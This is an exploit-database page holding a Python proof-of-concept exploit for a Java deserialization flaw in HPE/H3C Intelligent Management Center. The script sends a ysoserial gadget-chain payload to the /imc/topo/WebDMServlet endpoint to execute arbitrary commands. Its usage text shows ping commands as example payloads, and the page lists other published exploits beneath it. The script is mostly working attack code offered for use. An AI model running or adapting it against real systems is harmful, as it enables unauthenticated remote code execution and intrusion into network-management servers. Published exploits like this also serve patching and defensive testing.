Menu

Search for hundreds of thousands of exploits

"HPE < 7.2 - Java Deserialization"

Author

Exploit author

"Raphael Kuhn"

Platform

Exploit platform

java

Release date

Exploit published date

2017-09-19

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
#!/usr/bin/env python

########################################################################################################
# 
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
#    Tested on Windows Server 2008 R2
#    Name	HPE/H3C IMC (Intelligent Management Center)	Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
# 
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################

import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

host         = "127.0.0.1:8080"
payload_file = "payload.bin"
body        = ""

def printUsage () :
    print "......................................................................................................................"
    print "."
    print ". HPE/H3C - IMC Java Deserialization Exploit"
    print "."
    print ". Example 1: -payload-binary"
    print ". [-] Usage: %s http[s]://<IP>:<PORT> -payload-binary payload" % sys.argv[0]
    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print ".     1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
    print ".        java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
    print ".     2. Send request to server"
    print ".        %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin"  % sys.argv[0]
    print "."
    print ". Example 2: -payload-string"
    print '. [-] Usage: %s http[s]://<IP>:<PORT> -payload-string "payload"' % sys.argv[0]
    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print ".     1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
    print '.        %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"'  % sys.argv[0]
    print "."
    print "......................................................................................................................"

def loadPayloadFile (_fileName) :
    print "[+] Load payload file %s" % _fileName
    payloadFile = open(_fileName, 'rb')
    payloadFile_read = payloadFile.read()
    return payloadFile_read

def exploit (_payload) :
    url = sys.argv[1]
    url += "/imc/topo/WebDMServlet"
    print "[+] Sending exploit to %s" % (url) 
    data = _payload
    response = requests.post(url, data=data, verify=False)
    return response

#def showResponse(_response):
#    r = response
#    m = r.search(_response)
#    if (m.find("java.lang.NullPointerException")):
#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
#    else:
#        print "[-] ClassCastException not found, exploit failed"


if __name__ == "__main__":
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print "------------------------------------------"
        print "- HPE/H3C - IMC Java Deserialization Exploit -"
        print "------------------------------------------"
        host = sys.argv[1]
        print "[*] Connecting to %s" %host
    if sys.argv[2] == "-payload-binary":
        payload_file = sys.argv[3]
        if os.path.isfile(payload_file):
            payload = loadPayloadFile(payload_file)
            response = exploit(payload)
            showResponse(response.content)
        else:
            print "[-] Can't load payload file"
    elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                sPayload = sys.argv[3]
                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin"
                print "[+] Create payload file (%s) " %sPayload
                os.system(sPayload)
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load ysoserial.jar"
    else:
        printUsage()
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-11-02 "Apache Flink 1.9.x - File Upload RCE (Unauthenticated)" webapps java bigger.wing
2020-10-29 "WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request" webapps java "Mohammed Althibyani"
2020-10-20 "Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution" webapps java "Jonatas Fil"
2020-10-19 "Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in" webapps java "Daniel Morris"
2020-09-09 "Scopia XT Desktop 8.3.915.4 - Cross-Site Request Forgery (change admin password)" webapps java V1n1v131r4
2020-09-07 "ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)" webapps java Hodorsec
2020-08-10 "ManageEngine ADSelfService Build prior to 6003 - Remote Code Execution (Unauthenticated)" webapps java "Bhadresh Patel"
2020-07-26 "ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection" webapps java aldorm
2020-07-07 "Exhibitor Web UI 1.7.1 - Remote Code Execution" webapps java "Logan Sanderson"
2020-06-04 "VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution" webapps java "Tomas Melicher"
Release Date Title Type Platform Author
2017-09-19 "HPE < 7.2 - Java Deserialization" remote java "Raphael Kuhn" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected